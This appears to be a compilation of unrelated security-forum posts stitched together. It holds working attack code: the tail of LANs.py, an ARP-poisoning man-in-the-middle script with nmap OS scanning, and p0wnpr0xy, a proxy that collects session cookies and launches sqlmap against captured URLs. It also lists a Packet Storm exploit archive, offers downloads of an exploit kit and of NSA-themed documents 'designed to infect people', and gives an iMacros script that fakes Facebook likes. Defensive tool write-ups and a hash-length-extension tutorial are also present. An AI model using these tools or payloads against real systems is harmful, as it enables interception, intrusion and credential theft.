Router did not respond to ARP request for MAC, attempting to pull the MAC from the ARP cache" arpcache = Popen(['/usr/sbin/arp', '-n'], stdout=PIPE, stderr=DN) split_lines = arpcache.communicate()[0].splitlines() arpoutput = split_lines[1].split() routerMAC = arpoutput[2] print "[*] Router MAC: " + routerMAC logger.write("[*] Router MAC: "+routerMAC+'\n') except Exception: sys.exit("[-] [arp -n] failed to give accurate router MAC address") if args.victimmac: victimMAC = args.victimmac print "[*] Victim MAC: " + victimMAC logger.write("[*] Victim MAC: "+victimMAC+'\n') else: try: victimMAC = Spoof().originalMAC(victimIP) print "[*] Victim MAC: " + victimMAC logger.write("[*] Victim MAC: "+victimMAC+'\n') except Exception: exit("[-] Could not get victim MAC address; try the -vmac [xx:xx:xx:xx:xx:xx] option if you know the victim's MAC address") if dnsIP != routerIP: try: dnsMAC = Spoof().originalMAC(dnsIP) print "[*] DNS server MAC: " + dnsMAC except Exception: print "[-] Could not get DNS server MAC address; continuing" if dnsIP == routerIP: dnsMAC = routerMAC setup(victimMAC) Queued(args) threads(args) if args.nmap: print "\n[*] Running [nmap -T4 -O "+victimIP+"] this may take several minutes..." try: nmap = Popen(['/usr/bin/nmap', '-T4', '-O', '-e', interface, victimIP], stdout=PIPE, stderr=DN) nmap.wait() nmap = nmap.communicate()[0].splitlines() for x in nmap: if x != '': print '[+]',x logger.write('[+] '+x+'\n') except Exception: print '[-] Nmap port and OS scan failed, is it installed?' print '' # Cleans up if Ctrl-C is caught def signal_handler(signal, frame): print 'learing iptables, sending healing packets, and turning off IP forwarding...' logger.close() open('/proc/sys/net/ipv4/ip_forward', 'w').write('0\n') if not dnsIP == routerIP and dnsMAC: Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC) Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC) os.system('/sbin/iptables -F') os.system('/sbin/iptables -X') os.system('/sbin/iptables -t nat -F') os.system('/sbin/iptables -t nat -X') Spoof().restore(routerIP, victimIP, routerMAC, victimMAC) Spoof().restore(routerIP, victimIP, routerMAC, victimMAC) exit(0) signal.signal(signal.SIGINT, signal_handler) while 1: # If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router if not dnsIP == routerIP and dnsMAC: Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC) Spoof().poison(routerIP, victimIP, routerMAC, victimMAC) time.sleep(1.5) if __name__ == "__main__": main(parse_args()) Source: https://github.com/DanMcInerney/LANs.py

SMS Vulnerability In Nexus Phones Can Be Exploited To Force A Reboot Or Kill Cellular Connectivity Friday 11/29, at the DefCamp Security Conference 2013 in Bucharest, Romania, details were revealed about a potentially serious SMS vulnerability found in all current Nexus phones. The person responsible for the discovery is Bogdan Alecu, a system administrator at Levi9 and independent security researcher in Romania. When exploited, the attack can force the phone to reboot or destabilize certain services. The method of attack simply relies on sending a series of Class 0 "Flash" messages to the target phone. Flash messages are typically used for emergency or security purposes, appearing on the screen immediately instead of going to the default SMS application. When such a message arrives, no sounds are made but the background is dimmed and a single dialog box appears on top. Once 20-30 messages pile up, assuming the user isn't clearing them, it overloads the system and leads to a few potential side-effects. Most commonly, the result is an unresponsive device or an immediate reboot, but the Messages app or cellular radio may occasionally crash or freeze up in some instances. In the event that the cellular radio crashes, it may have some more serious consequences. If a target has their SIM locked with a PIN code, the phone will not be able to reconnect until the code is entered. From time to time, it's also possible for the cellular radio to seize up, which can only be fixed by restarting the device. This is problematic because there are no audible prompts and the malfunction won't be seen until the owner unlocks their screen, leaving them without service for potentially several hours. Alecu first notified The Android Security Team to the issue over a year ago, but initially received only automated responses. Continued efforts were mostly unsuccessful, leading to the decision to disclose the vulnerability publicly. To mitigate potential threats, he collaborated with Michael Muellerto develop Class0Firewall, an app designed to protect from Class 0 messages if they reach the threshold of becoming a denial-of-service attack. Bogdan notes that the current attack is only capable of destabilizing a phone, but theorizes that it might be possible to force remote code execution. Based on limited testing with devices from various vendors, the vulnerability appears to only affect the Nexus line running on all versions of stock Android through to the current release of KitKat. None of the OEM variants checked were susceptible to the attack. Hopefully the publicity will prompt Google to release a patch to block the issue as quickly as possible. Even if a fix is rolled out, it's not entirely clear if the Galaxy Nexus will receive it now that it is no longer getting OS updates. Ideally, the patch will be ported back to Android 4.3 and a security release will be made for the 2-year-old phone. Thanks, Bogdan Alecu! Via SMS Vulnerability In Nexus Phones Can Be Exploited To Force A Reboot Or Kill Cellular Connectivity

This archive contains all of the 129 exploits added to Packet Storm in November, 2013. Directory of :\\1311-exploits\1311-exploits 12/03/2013 07:15 AM <DIR> . 12/03/2013 07:15 AM <DIR> .. 11/30/2013 08:56 PM 3,875 abb_wserver_exec.rb.txt 11/12/2013 04:02 PM 3,231 allplayer562-overflow.txt 11/23/2013 05:55 PM 2,944 allplayer57-overflow.txt 11/09/2013 02:16 AM 6,645 altiris_ds_sqli.rb.txt 11/14/2013 06:04 PM 4,751 androidsuperuser-escalate.txt 11/14/2013 02:12 PM 2,139 androidsuperuser-exec.txt 11/14/2013 03:13 PM 2,863 androidsuperusershell-exec.txt 11/05/2013 01:26 AM 2,259 apachetomcat-csrf.txt 11/26/2013 03:52 AM 4,717 apache_roller_ognl_injection.rb.txt 11/06/2013 08:22 PM 3,026 apprain-sql.txt 11/26/2013 01:02 PM 1,478 audaciousplayer-dos.txt 11/16/2013 03:33 PM 6,692 avirasecurebackup-overflow.txt 11/10/2013 03:33 PM 1,312 belkinnetcam-backdoor.txt 11/27/2013 01:11 PM 1,526 boilsoftrmtomp3-dos.txt 11/27/2013 03:02 PM 921 bzrplayer-dllhijack.txt 11/27/2013 06:54 PM 4,085 chamilolms-sql.txt 11/27/2013 06:50 PM 5,610 clarolineconsortium-xss.txt 11/06/2013 01:45 AM 13,099 CORE-2013-0704.txt 11/06/2013 12:22 AM 2,333 csmars-xss.txt 11/29/2013 12:11 PM 1,951 CURE-2013-1006.txt 11/15/2013 09:22 PM 3,352 CURE-2013-1007.txt 11/30/2013 08:43 PM 47,890 CVE-2013-3934.py.txt 11/14/2013 09:22 PM 4,360 dahua-bypass.tgz 11/18/2013 11:22 PM 4,128 deepofix-bypass.txt 11/20/2013 11:33 PM 2,757 desktopcentral-shell.txt 11/21/2013 11:42 PM 4,648 desktopcentral_file_upload.rb.txt 11/27/2013 06:53 PM 3,041 dokeos-sql.txt 11/12/2013 01:46 AM 4,461 DSL-2760U-BN-NTS-XSS.txt 11/15/2013 04:44 PM 3,056 eclipsedotorg-sql.txt 11/17/2013 08:06 PM 912 elastix240-multiplexss.txt 11/05/2013 01:12 PM 1,815 enigmatiscms-sqlxss.txt 11/21/2013 09:45 PM 2,276 facebookfriends-disclosure.txt 11/19/2013 12:22 AM 1,354 facebooklanding-redir.txt 11/06/2013 01:11 PM 3,796 flatpress10-exec.txt 11/12/2013 04:44 PM 4,718 fortianalyzer-xsrf.txt 11/07/2013 03:55 PM 997 foscam-xss.txt 11/04/2013 12:11 PM 3,672 horde512-xssxsrf.txt 11/04/2013 03:03 PM 3,557 hotbox-dosxsrftraversal.txt 11/02/2013 06:00 AM 266 index.html 11/30/2013 05:33 AM 3,099 joomlajmultimedia-shell.txt 11/12/2013 03:13 PM 2,639 junos-xss.txt 11/19/2013 08:02 PM 9,920 kartoo-xssrfi.txt 11/20/2013 11:32 PM 3,291 kaseya-shell.txt 11/28/2013 03:32 AM 6,592 kimai_sqli.rb.txt 11/05/2013 04:04 PM 6,435 lbgzoom-xss.txt 11/23/2013 02:22 PM 3,125 lightallow-overflow.txt 11/17/2013 07:51 PM 3,694 limonade-disclose.txt 11/05/2013 04:02 PM 7,143 linkedinsocial-xss.txt 12/03/2013 07:15 AM 0 list.txt 11/15/2013 12:22 AM 4,198 ms10_015_kitrap0d.rb.txt 11/26/2013 03:52 AM 5,385 ms13_022_silverlight_script_object.rb.txt 11/26/2013 03:55 AM 17,462 ms13_090_cardspacesigninhelper.rb.txt 11/27/2013 07:00 PM 30,497 mswin_tiff_overflow.rb.txt 11/20/2013 01:11 PM 2,595 mybbajaxfs-sql.txt 11/25/2013 07:29 PM 2,872 netgear_readynas_exec.rb.txt 11/06/2013 01:22 PM 2,454 nullsec-microwebersqli.txt 11/04/2013 02:11 PM 2,912 old-site-avid_phonetic_indexer.rb.txt 11/04/2013 02:44 PM 61,171 old-site-finaldraft8.rb.txt 11/04/2013 02:33 PM 5,376 old-site-storyboardquick6.rb.txt 11/18/2013 01:11 PM 3,865 optomisesystem-disclosexss.txt 11/06/2013 01:23 PM 2,030 owaspjava-bypassxss.txt 11/26/2013 11:22 AM 5,706 panp-xssxsrf.txt 11/28/2013 04:04 PM 1,115 pastebin-bypass.txt 11/19/2013 07:22 PM 6,058 pineapp203-exec.txt 11/25/2013 06:22 PM 1,086 pirellidiscusdrga125g-disclose.txt 11/25/2013 07:18 PM 729 pirellidiscusdrga125g-passwd.txt 11/25/2013 07:22 PM 587 pirellidiscusdrga125g-ssidchange.txt 11/12/2013 03:03 PM 7,311 ploguesforzando-overflow.txt 11/05/2013 10:22 PM 8,446 por-sql.txt 11/05/2013 09:02 PM 3,733 por-xss.txt 11/12/2013 12:02 PM 481 provj5158-overflow.txt 11/11/2013 12:11 PM 1,479 pydioajaxplorer-shell.txt 11/09/2013 02:23 AM 1,336 raspcalendar-sql.txt 11/20/2013 07:22 PM 1,586 ruckuszoneflex-bypass.txt 11/05/2013 01:52 AM 2,912 site-confstuff-avid_phonetic_indexer.rb.txt 11/05/2013 02:12 AM 61,171 site-confstuff-finaldraft8.rb.txt 11/05/2013 02:15 AM 5,376 site-confstuff-storyboardquick6.rb.txt 11/19/2013 04:59 PM 3,925 skidata-exec.txt 11/17/2013 08:18 PM 4,936 smt_ipmi_close_window_bof.rb.txt 11/06/2013 02:33 PM 2,124 SOJOBO-ADV-13-03.txt 11/19/2013 12:44 AM 2,981 SOJOBO-ADV-13-04.txt 11/25/2013 07:05 PM 1,691 tapuzflix-bypass.txt 11/15/2013 09:22 AM 3,874 testa-sql.txt 11/05/2013 05:33 AM 4,067 tinymce327-sqlshell.txt 11/19/2013 01:03 AM 2,750 tomatocart1182-lfitraversal.txt 11/13/2013 02:12 PM 881 toshibaestudio-xsrf.txt 11/25/2013 01:11 PM 3,052 tplinkwr740n-xsrf.txt 11/03/2013 04:22 AM 2,180 tweetbot-disclose.txt 11/27/2013 08:20 PM 3,759 uptime-overflow.tgz 11/21/2013 06:44 AM 712 vbseo320360-xss.txt 11/08/2013 03:32 AM 7,290 vicidial_manager_send_cmd_exec.rb.txt 11/12/2013 04:55 PM 5,046 VideoSpirit_Lite.rb.txt 11/12/2013 04:45 PM 5,064 VideoSpirit_Pro.rb.txt 11/04/2013 03:33 PM 6,723 VL-1130.txt 11/19/2013 07:20 PM 11,479 VL-1140.txt 11/29/2013 05:05 PM 7,738 VL-1150.txt 11/20/2013 12:11 PM 10,075 VL-651.txt 11/19/2013 01:11 PM 9,233 VL-801.txt 11/19/2013 03:02 PM 14,493 VL-807.txt 11/19/2013 01:11 PM 10,465 VL-860.txt 11/14/2013 03:45 PM 4,996 watermarkmaster-sehoverflow.txt 11/06/2013 11:22 AM 3,304 weberscms-sqlxsslfi.txt 11/27/2013 12:11 PM 1,026 wondershare-dllhijack.txt 11/26/2013 12:11 PM 1,274 wpamerisalere-xss.txt 11/17/2013 04:22 AM 1,558 wpamplus-xsrf.txt 11/24/2013 05:04 PM 1,157 wpblogfolio-shell.txt 11/23/2013 04:44 PM 1,366 wpbloggie-shell.txt 11/12/2013 12:11 PM 4,946 wpcurvo-shell.rb.txt 11/17/2013 05:33 AM 1,450 wpdimension-xsrf.txt 11/23/2013 12:11 PM 1,360 wpelemin-shell.txt 11/17/2013 06:44 AM 1,587 wpeuclid-xsrf.txt 11/23/2013 01:11 PM 1,348 wpfolo-shell.txt 11/30/2013 06:44 AM 1,963 wpfolo-xss.txt 11/10/2013 12:11 PM 1,102 wphighlightpremium-shellxsrf.txt 11/20/2013 11:22 AM 1,163 wpithemes2-shell.txt 11/17/2013 04:22 AM 1,482 wpmakeastatement-xsrf.txt 11/26/2013 01:02 PM 1,232 wpoptinfirex-xss.txt 11/23/2013 03:33 PM 1,372 wppinboard-shell.txt 11/20/2013 03:03 PM 2,108 wpprettyphoto-xss.txt 11/20/2013 02:22 PM 1,139 wpsuco-shell.txt 11/12/2013 01:11 PM 4,956 wptheme-shell.rb.txt 11/08/2013 02:22 PM 1,095 wpthemekernel-shell.txt 11/13/2013 03:13 PM 2,369 wpthemes-shell.tgz 11/03/2013 02:22 PM 2,028 wpthinkresponsive-shell.txt 11/04/2013 12:22 PM 2,163 wpthisway-shell.txt 11/19/2013 01:01 AM 3,373 wptweetblender-xss.txt 11/13/2013 08:22 PM 3,256 zikula135-xss.txt 11/03/2013 07:02 PM 10,305 ZSL-2013-5159.txt 11/05/2013 01:58 AM 6,433 ZSL-2013-5160.txt 11/25/2013 07:01 PM 2,817 ZSL-2013-5161.txt 11/30/2013 08:45 PM 2,952 ZSL-2013-5162.txt 131 File(s) 675,598 bytes 2 Dir(s) 42,559,303,680 bytes free Download

GongDa Decode! Version Nov-2013 Edit line http://www.youexe.com/windows.exe -- you exe download: https://anonfiles.com/file/ac83ca473c3c768e2783f4457f03fa66

mails are from United states government "Nsa" include editable document Custom design to infect people initially Government download https://anonfiles.com/file/ee6d9ecd6ff5751006cfec4f50784548

salvezi comenzile astea intr-un fisier .txt in C:\Documents and Settings\[uSER]\My Documents\iMacros\Macros VERSION BUILD=7601105 RECORDER=FX 'eubest TAB T=1 SET !ERRORIGNORE yes URL GOTO=http://addmefast.com/free_points/facebook_likes.html WAIT SECONDS=3 TAG POS=1 TYPE=A ATTR=TXT:Like TAB T=2 FRAME F=0 TAG POS=1 TYPE=LABEL ATTR=ID:timelineHeadlineLikeButton WAIT SECONDS=3 TAB T=2 TAB T=1 TAB CLOSEALLOTHERS WAIT SECONDS=5 pe care il redenumesti ulterior in #Fb Page Likes.iim

Random Wordlist Generator is a simple multi-platform tool which allows you to create a wordlist of random words. You can generate random words using different sets of characters. With a mouse click, you can generate thousands of different words in a few minutes. Download Install: To install the program you need Qt4 and cmake: mkdir build cd build cmake -DCMAKE_INSTALL_PREFIX=/usr .. make make install Authored by Francesco Mondello Files from Francesco Mondello ? Packet Storm

foarte Ok serviciile, recomand Like

"Crack Me If You Can" - DEFCON 2010 Files ? Packet Storm Passwords - SkullSecurity Index of /passwd/passwords

p0wnpr0xy.py is a simply python script that acts as a http/https proxy and launches commands such as sqlmap against targets that are in-scope. It relies on httpservers.py from gnucitizen to do the heavy lifting. You can download his module from here and save it to the same directory as p0wnpr0xy. When you launch p0wnpr0xy you supply it with two arguments: 1) Part of the domain name for the in-scope hosts 2) The full command line for the tool you want to use against the target URL p0wnpr0xy will start a proxy listener on port 8080. You modify your browsers proxy settings to browse through the proxy. The proxy will collect in-scope URLs and the cookies associated with each URL. It then walks you through all of the URL that have been collected and gives you the option to launch the specified command on each URL. If you choose to attack the URL it will launch the command specified on the command line replacing the string "{url}" with the URL collected and the string "{cookies}" with cookies it has collected. Pretty simple, but it can make repetitive tasks easier. Here is an demonstration of how you can use p0wnpr0xy along with sqlmap. http://vimeo.com/14667308 # p0wnpr0xy.py by Mark Baggett # Download from www.pauldotcom.com # create a self signed certificate and modify /path/to/cert/file string to avoid HTTPS socket errors # download httpservers.py from http://code.google.com/p/gnucitizen/source/browse/trunk/httpservers.py and place it in the same directory import httpservers import SocketServer from Queue import Queue from threading import Thread import time,re,sys,os import pdb class Handler(httpservers.SimpleObservableProxyHTTPReque stHandler): def observe_request(self, data): #pdb.set_trace() global inscopeurls, target_domain #print "REQ>>"+repr(data)[:50] matchstring="Host:\s[\w_.]+%s" % target_domain matchscope = re.findall(matchstring, data, re.I) if matchscope: inscopeurls.put(repr(data)) return data def observe_response(self, data): #print "RSP<<"+repr(data)[:50] return data def log_request(self, code): pass class Server(SocketServer.ThreadingMixIn, httpservers.SimpleObservableProxyHTTPServer): pass def proxyserver(): print 'Starting server on localhost:8080...' srv = Server(('localhost', 8080), Handler, '/path/to/cert/file') srv.serve_forever() def printhelp(): print """Here is your help. sample p0wnpr0xy.py -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}" """ # Set up some global variables num_attack_threads = 2 inscopeurls = Queue() if not "-t" in sys.argv or not "-c" in sys.argv: printhelp() sys.exit(2) for i in range(1,len(sys.argv),1): if sys.argv == '-t': target_domain=str(sys.argv[i+1]) elif sys.argv == '-c': cmd = " ".join(sys.argv[i+1:]) elif sys.argv == '-v': verbose=1 proxythread = Thread(target=proxyserver) proxythread.setDaemon(True) proxythread.start() while 1: if inscopeurls.qsize()==0: #print "Nothing in Queue, Waiting." time.sleep(5) continue queueitem = inscopeurls.get() matches = re.findall("GET (/[\w._/\\-?=&]+).*Host:\s([\w_.]+)", queueitem, re.I) if matches: matchuri,matchdomain = matches[0] checkit = raw_input(":"+str(inscopeurls.qsize())+":P0wn http://"+matchdomain+matchuri+"? [Y/N/Q]") if checkit == "q" or checkit == "Q": sys.exit(2) if checkit =="y" or checkit=="Y": cookies = "".join(re.findall("cookie:\s([\w+;= ]+)", queueitem, re.I)) cmd1 = cmd.replace("{cookies}",cookies) cmd2 = cmd1.replace("{url}","http://"+matchdomain+matchuri) print "Launching "+cmd2 os.system(cmd2) Source: PaulDotCom: Archives

AxCrypt is the leading open source Windows file encryption software. It integrates seamlessly with Windows to compress, encrypt, decrypt, store, send and work with individual files. Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.Axantum Software AB | AxCrypt | File Encryption Software Features Password Protect any number of files using strong encryption. Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows. Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files. Many additional features, but no configuration required. Just install it and use it. AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt. AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language. AxCrypt is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation. You can download AxCrypt here: AxCrypt-1.7.2976.0-Setup.exe Axantum Software AB | AxCrypt | File Encryption Software

Current Release: http://www.rfxn.com/downloads/bfd-current.tar.gz http://www.rfxn.com/appdocs/README.bfd http://www.rfxn.com/appdocs/CHANGELOG.bfd Description BFD is a modular shell script for parsing application logs and checking for authentication failures. It does this using a rules system where application specific options are stored including regular expressions for each unique auth format. The regular expressions are parsed against logs using the ‘sed’ tool (stream editor) which allows for excellent performance in all environments. In addition to the benefits of parsing logs in a single stream with sed, BFD also uses a log tracking system so logs are only parsed from the point which they were last read. This greatly assists in extending the performance of BFD even further as we are not constantly reading the same log data. The log tracking system is compatible with syslog/logrotate style log rotations which allows it to detect when rotations have happened and grab log tails from both the new log file and the rotated log file. You can leverage BFD to block attackers using any number of tools such as APF, Shorewall, raw iptables, ip route or execute any custom command. There is also a fully customizable e-mail alerting system with an e-mail template that is well suited for every day use or you can open it up and modify it. The attacker tracking in BFD is handled using simple flat text files that are size-controlled to prevent space constraints over time, ideal for diskless devices. There is also an attack pool where trending data is stored on all hosts that have been blocked including which rule the block was triggered by. In the execution process, there is simply a cron job that executes BFD once every 3 minutes by default. The cronjob can be run more frequently for those that desire it and doing so will not cause any performance issues (no less than once a minute). Although cron execution does not permit BFD to act in real time, the log tracking system ensures it never misses a beat in authentication failures. Further, using cron provides a reliable frame work for consistent execution of BFD in a very simplified fashion across all *nix platforms. https://www.rfxn.com/projects/brute-force-detection/

Current Release: http://www.rfxn.com/downloads/maldetect-current.tar.gz http://www.rfxn.com/appdocs/README.maldetect http://www.rfxn.com/appdocs/CHANGELOG.maldetect Description Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches, they are also easily exported to any number of detection tools such as ClamAV. The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and more important that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments. The threat landscape in shared hosted environments is unique from that of the standard AV products detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform. Using the CYMRU malware hash registry, which provides malware detection data for 30 major AV packages, we can demonstrate this short coming in current threat detection. The following is an analysis of the core MD5 hashes (5,393) in LMD 1.4.0 and the percentage of major AV products that currently detect the hashes. KNOWN MALWARE: 1029 % AV DETECT (AVG): 48 % AV DETECT (LOW): 58 % AV DETECT (HIGH): 80 UNKNOWN MALWARE: 4364 What this information means, is that of the of the 5,393 hashes, 81% or 4,364 malware items are not detected / known by the top 30 major AV packages. The 1,029 malware items that are known / detected have an average of a 48% detection rate among major AV packages with a low / high margin of detection at 58 and 80 percent respective. This clearly demonstrates the lacking capability in currently available tools and why it is important that something fill the void, especially in the Linux shared hosted environment. Features: - MD5 file hash detection for quick threat identification - HEX based pattern matching for identifying threat variants - statistical analysis component for detection of obfuscated threats (e.g: base64) - integrated detection of ClamAV to use as scanner engine for improved performance - integrated signature update feature with -u|–update - integrated version update feature with -d|–update-ver - scan-recent option to scan only files that have been added/changed in X days - scan-all option for full path based scanning - checkout option to upload suspected malware to rfxn.com for review / hashing - full reporting system to view current and previous scan results - quarantine queue that stores threats in a safe fashion with no permissions - quarantine batching option to quarantine the results of a current or past scans - quarantine restore option to restore files to original path, owner and perms - quarantine suspend account option to Cpanel suspend or shell revoke users - cleaner rules to attempt removal of malware injected strings - cleaner batching option to attempt cleaning of previous scan reports - cleaner rules to remove base64 and gzinflate(base64 injected malware - daily cron based scanning of all changes in last 24h in user homedirs - daily cron script compatible with stock RH style systems, Cpanel & Ensim - kernel based inotify real time file scanning of created/modified/moved files - kernel inotify monitor that can take path data from STDIN or FILE - kernel inotify monitor convenience feature to monitor system users - kernel inotify monitor can be restricted to a configurable user html root - kernel inotify monitor with dynamic sysctl limits for optimal performance - kernel inotify alerting through daily and/or optional weekly reports - e-mail alert reporting after every scan execution (manual & daily) - path, extension and signature based ignore options - background scanner option for unattended scan operations - verbose logging & output of all actions Source Data: The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating. There are four main sources for malware data that is used to generate LMD signatures: - Network Edge IPS: The network I manage hosts over 35,000 web sites and as such receives a large amount of daily abuse, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data. - Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures. - ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there has been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis. - User Submission: LMD has a checkout feature that allows users to submit suspected malware for review, this has grown into a very popular feature and generates on average about 30-50 submissions per week. Signature Updates: The LMD signature are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the –update option, which can be run manually at any time. An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd Detected Threats: LMD 1.4.0 has a total of 7,241 (5393 MD5 / 1848 HEX) signatures (before updates), below is a listing of the top 60 threats by prevalence detected by LMD: base64.inject.unclassed perl.ircbot.xscan bin.dccserv.irsexxy perl.mailer.yellsoft bin.fakeproc.Xnuxer perl.shell.cbLorD bin.ircbot.nbot perl.shell.cgitelnet bin.ircbot.php3 php.cmdshell.c100 bin.ircbot.unclassed php.cmdshell.c99 bin.pktflood.ABC123 php.cmdshell.cih bin.pktflood.osf php.cmdshell.egyspider bin.trojan.linuxsmalli php.cmdshell.fx29 c.ircbot.tsunami php.cmdshell.ItsmYarD exp.linux.rstb php.cmdshell.Ketemu exp.linux.unclassed php.cmdshell.N3tshell exp.setuid0.unclassed php.cmdshell.r57 gzbase64.inject php.cmdshell.unclassed html.phishing.auc61 php.defash.buno html.phishing.hsbc php.exe.globals perl.connback.DataCha0s php.include.remote perl.connback.N2 php.ircbot.InsideTeam perl.cpanel.cpwrap php.ircbot.lolwut perl.ircbot.atrixteam php.ircbot.sniper perl.ircbot.bRuNo php.ircbot.vj_denie perl.ircbot.Clx php.mailer.10hack perl.ircbot.devil php.mailer.bombam perl.ircbot.fx29 php.mailer.PostMan perl.ircbot.magnum php.phishing.AliKay perl.ircbot.oldwolf php.phishing.mrbrain perl.ircbot.putr4XtReme php.phishing.ReZulT perl.ircbot.rafflesia php.pktflood.oey perl.ircbot.UberCracker php.shell.rc99 perl.ircbot.xdh php.shell.shellcomm Real-Time Monitoring: The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with: Upgrade CentOS 4.8 to 5.x (32bit) | R-fx Networks There are three modes that the monitor can be executed with and they relate to what will be monitored, they are USERS|PATHS|FILES. e.g: maldet --monitor users e.g: maldet --monitor /root/monitor_paths e.g: maldet --monitor /home/mike,/home/ashton The options break down as follows: USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then the users webdir, if it exists, will only be monitored. PATHS: A comma spaced list of paths to monitor FILE: A line spaced file list of paths to monitor Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to setup a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage. See http://www.rfxn.com/appdocs/README.maldetect for more details on inotify monitoring. https://www.rfxn.com/projects/linux-malware-detect/

You can grab the hash_extender tool on Github! (Administrative note: I’m no longer at Tenable! I left on good terms, and now I’m a consultant at Leviathan Security Group. Feel free to contact me if you need more information!) Awhile back, my friend @mogigoma and I were doing a capture-the-flag contest at https://stripe-ctf.com. One of the levels of the contest required us to perform a hash length extension attack. I had never even heard of the attack at the time, and after some reading I realized that not only is it a super cool (and conceptually easy!) attack to perform, there is also a total lack of good tools for performing said attack! After hours of adding the wrong number of null bytes or incorrectly adding length values, I vowed to write a tool to make this easy for myself and anybody else who’s trying to do it. So, after a couple weeks of work, here it is! Now I’m gonna release the tool, and hope I didn’t totally miss a good tool that does the same thing! It’s called hash_extender, and implements a length extension attack against every algorithm I could think of: MD4 MD5 RIPEMD-160 SHA-0 SHA-1 SHA-256 SHA-512 WHIRLPOOL I’m more than happy to extend this to cover other hashing algorithms as well, provided they are “vulnerable” to this attack — MD2, SHA-224, and SHA-384 are not. Please contact me if you have other candidates and I’ll add them ASAP! The attack An application is susceptible to a hash length extension attack if it prepends a secret value to a string, hashes it with a vulnerable algorithm, and entrusts the attacker with both the string and the hash, but not the secret. Then, the server relies on the secret to decide whether or not the data returned later is the same as the original data. It turns out, even though the attacker doesn’t know the value of the prepended secret, he can still generate a valid hash for {secret || data || attacker_controlled_data}! This is done by simply picking up where the hashing algorithm left off; it turns out, 100% of the state needed to continue a hash is in the output of most hashing algorithms! We simply load that state into the appropriate hash structure and continue hashing. TL;DR: given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix. Example Let’s look at a step-by-step example. For this example: let secret = “secret” let data = “data” let H = md5() let signature = hash(secret || data) = 6036708eba0d11f6ef52ad44e8b74d5b let append = “append” The server sends data and signature to the attacker. The attacker guesses that H is MD5 simply by its length (it’s the most common 128-bit hashing algorithm), based on the source, or the application’s specs, or any way they are able to. Knowing only data, H, and signature, the attacker’s goal is to append append to data and generate a valid signature for the new data. And that’s easy to do! Let’s see how. Padding Before we look at the actual attack, we have to talk a little about padding. When calculating H(secret + data), the string (secret + data) is padded with a ’1? bit and some number of ’0? bits, followed by the length of the string. That is, in hex, the padding is a 0×80 byte followed by some number of 0×00 bytes and then the length. The number of 0×00 bytes, the number of bytes reserved for the length, and the way the length is encoded, depends on the particular algorithm and blocksize. With most algorithms (including MD4, MD5, RIPEMD-160, SHA-0, SHA-1, and SHA-256), the string is padded until its length is congruent to 56 bytes (mod 64). Or, to put it another way, it’s padded until the length is 8 bytes less than a full (64-byte) block (the 8 bytes being size of the encoded length field). There are two hashes implemented in hash_extender that don’t use these values: SHA-512 uses a 128-byte blocksize and reserves 16 bytes for the length field, and WHIRLPOOL uses a 64-byte blocksize and reserves 32 bytes for the length field. The endianness of the length field is also important. MD4, MD5, and RIPEMD-160 are little-endian, whereas the SHA family and WHIRLPOOL are big-endian. Trust me, that distinction cost me days of work! In our example, length(secret || data) = length(“secretdata”) is 10 (0x0a) bytes, or 80 (0×50) bits. So, we have 10 bytes of data (“secretdata”), 46 bytes of padding (80 00 00 …), and an 8-byte little-endian length field (50 00 00 00 00 00 00 00), for a total of 64 bytes (or one block). Put together, it looks like this: 0000 73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 secretdata...... 0010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 